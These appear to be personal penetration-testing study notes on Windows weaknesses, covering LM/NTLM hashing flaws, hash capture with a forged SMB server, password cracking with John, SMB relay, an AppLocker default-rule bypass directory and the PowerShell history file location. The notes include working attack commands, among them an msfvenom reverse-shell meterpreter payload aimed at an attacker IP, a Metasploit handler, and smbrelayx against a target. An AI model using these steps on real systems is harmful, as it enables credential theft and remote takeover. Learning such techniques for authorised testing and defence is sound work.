Windows Weaknesses

NTLM

3 types:

1. Type 1: Negotiation

2. Type 2: Challenge

3. Type 3: Authentication

LM / NTLMv1

Use DES to encrypt the password. Weaknesses:

1. Password are all transformed to UPPER CASE

2. Add null characters until it is 14-bytes long

3. Split password into 2 blocks

4. Fixed string "KGS!@#$%" is used to encrypt

5. The two ciphertext are concatenated to form a 16-byte value

The NTLM hash generation:

1. Convert user password to UNICODE

2. MD4 to get a 16-byte long hash

1. Client sends a request for authentication

2. Server sends back a 8-byte random challenge

3. Client encrypt the challenge using the password hash and send as response (Note the 16-byte hash will be padded by 5 null bytes, making it 21-byte long) (Then this thing will be split by 3 parts as the encryption key to the server challenge)

The whole process from the client is:

NTLM Weaknesses

1. Each encryption output is not linked to previous one

2. DES is an old algorithm and not considered safe.

3. The 3rd block always has 0x00 padding!

4. The only randomness is the server's challenge

5. If the password length is < 7, the last 8 bytes of the LMHASH is always 2f85252cc731bb25

Forged SMB Server

Metasploit module:

auxiliary/server/capture/smb

To save the captured hashes, configure the parameter JOHNPWFILE. By doing so, captured hashes will be saved in the file to work with John the Ripper.

After the fake SMB server is up, force clients to start a connection to it. For example, network share connection \\x.x.x.x\share.Or an HTML tag <img src="\\x.x.x.x\share">, where x.x.x.x is the attacker IP.

Then use John the crack the password:

john --format=netlm hashes.txt

SMB Relay

Metasploit

exploit/windows/smb/smb_relay

smbrelayx.py also serves the same purpose. Using this, first use msfvenom to generate a payload (e.g. meterpreter.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f exe -o meterpreter.exe

Start a handle in msfconsole.

use exploit/multi/handler
use payload windows/meterpreter/reverse_tcp

Finally use smbrelayx

smbrelayx.py -h <target> -e <msfvenom_payload>

Applocker Default Config

There are many ways to bypass AppLocker.

If AppLocker is configured with default AppLocker rules, we can bypass it by placing our executable in the following directory: C:\Windows\System32\spool\drivers\color - This is whitelisted by default.

Powershell History

%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt